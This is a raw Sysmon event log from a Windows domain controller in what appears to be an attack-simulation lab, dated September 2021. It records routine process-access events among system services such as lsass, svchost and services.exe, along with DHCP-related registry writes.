09:20:00.389{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.389{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x80000000000000001052662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\IsServerNapAwareDWORD (0x00000000) 13241300x80000000000000001052661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\AddressTypeDWORD (0x00000000) 13241300x80000000000000001052660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\LeaseTerminatesTimeDWORD (0x61519ad0) 13241300x80000000000000001052659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\T2DWORD (0x6151990e) 13241300x80000000000000001052658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\T1DWORD (0x615193c8) 13241300x80000000000000001052657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\LeaseObtainedTimeDWORD (0x61518cc0) 13241300x80000000000000001052656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\LeaseDWORD (0x00000e10) 13241300x80000000000000001052655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpServer10.0.1.1 13241300x80000000000000001052654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpSubnetMask255.255.255.0 13241300x80000000000000001052653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpIPAddress10.0.1.14 13241300x80000000000000001052652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpInterfaceOptionsBinary Data 13241300x80000000000000001052651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001052650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001052649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001052648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.357{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\Dhcpv6StateDWORD (0x00000001) 13241300x80000000000000001052647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.342{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\Dhcpv6StateDWORD (0x00000000) 10341000x80000000000000001052646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.342{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.342{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.326{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x80000000000000001052643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.326{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.326{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.310{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.310{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.310{5EBD8912-8CC0-6151-0E00-00000000FD01}10081056C:\Windows\system32\LogonUI.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.310{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.310{5EBD8912-8CBD-6151-0A00-00000000FD01}624108C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.310{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.310{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.310{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBD-6151-0A00-00000000FD01}624700C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 